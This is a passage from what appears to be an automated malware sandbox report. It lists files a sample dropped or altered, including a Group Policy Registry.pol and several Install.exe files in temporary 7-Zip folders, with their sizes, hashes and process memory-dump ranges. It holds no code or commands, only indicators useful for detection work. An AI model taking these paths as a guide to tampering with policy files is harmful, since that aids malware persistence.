                                                                                                              6.5MB

                                                                                                              MD5

                                                                                                              cfe428169166545941ae665ac1d2578c

                                                                                                              SHA1

                                                                                                              8820ba8de5ce6658c6968f40117b5e8a3a1f4eab

                                                                                                              SHA256

                                                                                                              fd819cf2f5db063ba817d32d14ca2e5d75364807cc9ba53248dfc1578b90dc53

                                                                                                              SHA512

                                                                                                              49442efba4dc52121d6e5f91210a73a9479682cc976b90da333bc601f3789e12588cfd3933eafe7ce260ef93b2d8eade6f31b0d65c5ca0728e8df961e8a36d96

                                                                                                            • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                              Filesize

                                                                                                              6KB

                                                                                                              MD5

                                                                                                              c559b9e00b20d6f92cc813d899a4e100

                                                                                                              SHA1

                                                                                                              4803773dcbcf83fcc99830267b4149369909491e

                                                                                                              SHA256

                                                                                                              138cf60e1e9329ae6b5fdf3448f33e5c482c72814777ef709bfa902843232745

                                                                                                              SHA512

                                                                                                              3649030e1663627e11dbc56f6073026f2438d9047db218eee2de8ab012a020491324250056cf81c9da85668ddb7efbd2bf5a36790932dfdfb7c1ed38e28c6471

                                                                                                            • \Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe

                                                                                                              Filesize

                                                                                                              6.4MB

                                                                                                              MD5

                                                                                                              aaef9b8c0610b8465e21846d327686bb

                                                                                                              SHA1

                                                                                                              82ec975f472399b0d82e60df0312b866e0f91709

                                                                                                              SHA256

                                                                                                              dc7b0a8e34ab5558f0fb0a52a92261556110d1ce094f34be8fcbe408535fc379

                                                                                                              SHA512

                                                                                                              4f33cd8fc62e109d3a598a4630ffc2603827a3b4b49ae2e7a184585ca7ea83790d9b3f60d46889606c940cf46bfe949d41339bf2d70383dad43c3ce160176119

                                                                                                            • \Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe

                                                                                                              Filesize

                                                                                                              6.6MB

                                                                                                              MD5

                                                                                                              d121107c5261ab15018ad1e759aa45a5

                                                                                                              SHA1

                                                                                                              c8753c8765f20a1187ffb749f3a5592276e2415f

                                                                                                              SHA256

                                                                                                              30afb4810b65dd25f3883bea4158c3e00d2c666260cdeb880b105f11aab89d61

                                                                                                              SHA512

                                                                                                              c5ec43cc109c57f4c3eec34dfcf2b17f6791415dff8b6e780bceed4c8bd6cd90ac962b4beb712d489bb7ab78c7b4537623594f56d2cbc6becc020d7d38dfd41b

                                                                                                            • memory/612-319-0x0000000002C30000-0x0000000002CBC000-memory.dmp

                                                                                                              Filesize

                                                                                                              560KB

                                                                                                            • memory/612-329-0x0000000002A10000-0x0000000002AE3000-memory.dmp

                                                                                                              Filesize

                                                                                                              844KB

                                                                                                            • memory/612-87-0x00000000002E0000-0x0000000000987000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/612-89-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB

                                                                                                            • memory/612-101-0x0000000002200000-0x0000000002285000-memory.dmp

                                                                                                              Filesize

                                                                                                              532KB

                                                                                                            • memory/612-364-0x00000000002E0000-0x0000000000987000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/612-135-0x00000000002E0000-0x0000000000987000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/612-136-0x00000000025E0000-0x0000000002648000-memory.dmp

                                                                                                              Filesize

                                                                                                              416KB

                                                                                                            • memory/2068-44-0x0000000000D00000-0x00000000013A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2068-46-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB

                                                                                                            • memory/2068-88-0x0000000000D00000-0x00000000013A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2068-58-0x0000000000D00000-0x00000000013A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-39-0x0000000001130000-0x00000000017D7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-29-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB

                                                                                                            • memory/2116-23-0x0000000001130000-0x00000000017D7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-24-0x00000000009B0000-0x0000000001057000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-25-0x00000000009B0000-0x0000000001057000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-26-0x00000000009B0000-0x0000000001057000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2276-68-0x000000001B590000-0x000000001B872000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/2276-69-0x00000000027A0000-0x00000000027A8000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2312-18-0x00000000024A0000-0x0000000002B47000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2396-57-0x0000000002040000-0x0000000002048000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2396-56-0x000000001B750000-0x000000001BA32000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/2704-352-0x0000000001310000-0x00000000018F3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB

                                                                                                            We care about your privacy.

                                                                                                            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.